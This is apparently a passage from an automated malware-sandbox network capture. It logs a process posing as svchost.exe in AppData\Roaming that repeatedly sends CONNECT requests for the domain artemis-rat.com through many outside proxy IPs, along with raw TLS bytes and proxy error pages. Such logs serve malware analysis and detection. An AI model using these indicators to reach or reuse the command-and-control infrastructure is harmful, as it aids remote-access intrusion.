64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 39 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2019 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2598	192.168.2.5	58543	54.248.238.110	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.006778955 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.273166895 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:31 GMT Server: nginx Content-Type: text/plain Content-Length: 0
Mar 9, 2024 13:14:31.305476904 CET	369	OUT	Data Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ec 52 a5 11 ad c7 67 7c 84 b5 c7 be a3 cd 79 e8 0d 5b 85 a0 2d 8b cf f0 4e 28 67 07 c5 72 2f 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: lheRg\|y[-N(gr/*,+0/$#('=<5/artemis-rat.com#N i}#1biQA"pcH!#6SV82MG]pp
Mar 9, 2024 13:14:31.605187893 CET	1079	IN	Data Raw: 16 03 03 00 3d 02 00 00 39 03 03 f0 86 01 7b 56 2c a8 7e 18 c6 42 2f 14 6e 7a 82 0f ce 88 b1 8b 0a fe 04 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30 Data Ascii: =9{V,~B/nzDOWNGRD0000H010Uartemis-rat.com0240309120120Z260309120120Z010Uartemis-rat.com0"0H0LU,m-YLa
Mar 9, 2024 13:14:31.608006954 CET	93	OUT	Data Raw: 16 03 03 00 25 10 00 00 21 20 63 a7 32 49 cb 37 f1 77 96 ab ed a6 ea d5 cd 32 a3 68 2b 1d 6e a4 bc 02 83 1c 96 f5 20 e1 98 71 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 00 d3 df 54 2f df 6e 0f 8a 13 ea 51 6c e4 72 cf 3f 55 e6 9f 25 Data Ascii: %! c2I7w2h+n q(T/nQlr?U%- v
Mar 9, 2024 13:14:31.872462988 CET	51	IN	Data Raw: 14 03 03 00 01 01 16 03 03 00 28 b5 f2 4b 0d d3 90 bb e5 45 35 4d 0c 54 d4 63 bf 99 cb 67 70 5d 8a 54 b4 19 2e 42 d7 99 b6 af 63 07 8e ad 1a 34 80 8b d5 Data Ascii: (KE5MTcgp]T.Bc4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2599	192.168.2.5	58794	45.144.30.205	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.013448000 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2600	192.168.2.5	58796	45.144.30.205	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.015017986 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2601	192.168.2.5	58514	121.164.200.18	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.016129971 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2602	192.168.2.5	58798	45.144.30.205	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.016482115 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2603	192.168.2.5	58802	45.144.30.205	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.018384933 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2604	192.168.2.5	58511	51.210.223.9	3000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.019401073 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2605	192.168.2.5	58807	31.7.65.18	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.021677017 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2606	192.168.2.5	58808	31.7.65.18	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.023174047 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2607	192.168.2.5	58666	104.23.126.8	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.026797056 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.180864096 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2608	192.168.2.5	58671	104.17.37.235	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.027087927 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.181113958 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2609	192.168.2.5	58809	31.7.65.18	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.027225971 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2610	192.168.2.5	58810	31.7.65.18	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.028561115 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2611	192.168.2.5	58502	47.96.145.14	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.044887066 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.382698059 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2612	192.168.2.5	58553	51.15.247.93	16379	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.050332069 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2613	192.168.2.5	57606	139.162.181.177	57942	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.050523043 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.802095890 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2614	192.168.2.5	58705	104.16.109.143	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.050776005 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.206605911 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2615	192.168.2.5	57650	54.36.122.16	39713	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.050786018 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.802093983 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2616	192.168.2.5	57531	149.202.91.219	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.052808046 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.802146912 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2617	192.168.2.5	58721	45.12.30.231	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.054231882 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.208434105 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2618	192.168.2.5	58722	104.24.193.186	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.056499004 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.210613012 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2619	192.168.2.5	58577	188.166.17.18	8881	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.063150883 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2620	192.168.2.5	58533	43.131.246.77	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.063401937 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2621	192.168.2.5	58572	221.153.92.39	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.065634966 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2622	192.168.2.5	58557	150.109.243.156	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.075998068 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
